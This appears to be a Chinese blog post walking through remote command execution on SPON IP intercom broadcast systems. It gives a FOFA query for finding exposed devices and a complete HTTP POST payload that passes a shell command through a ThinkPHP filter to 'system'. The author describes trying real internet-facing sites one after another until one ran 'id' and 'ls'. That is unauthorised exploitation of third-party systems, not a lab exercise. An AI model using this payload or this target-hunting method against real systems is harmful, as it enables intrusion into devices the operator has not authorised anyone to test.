SPON IP网络对讲广播系统的命令执行漏洞复现实验

第一步:使用fofa搜索语句搜索

fofa地址:网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

查询漏洞的语句icon_hash="-1830859634"

第二步:访问网址,抓包,将host改为搜到的地址

第三步:将如下的数据包内容复制替换抓到的数据包

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

第四步:发送到重放器查看。

我查到的好几个都是如下图的,显示404,所以没有这个漏洞,一直尝试下一个网站

第一个网址不行的话,再试下一个,直到可以为止,如下图的地方可以直接修改新的目标地址。

我最后抓到了一个有漏洞的,它和之前的显示页面都不一样,显示出了id的参数。

第五步:将s=id改为s=ls(任意cmd的系统命令)

可以看出我的页面里面列出了,,他的当前目录下的文件

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值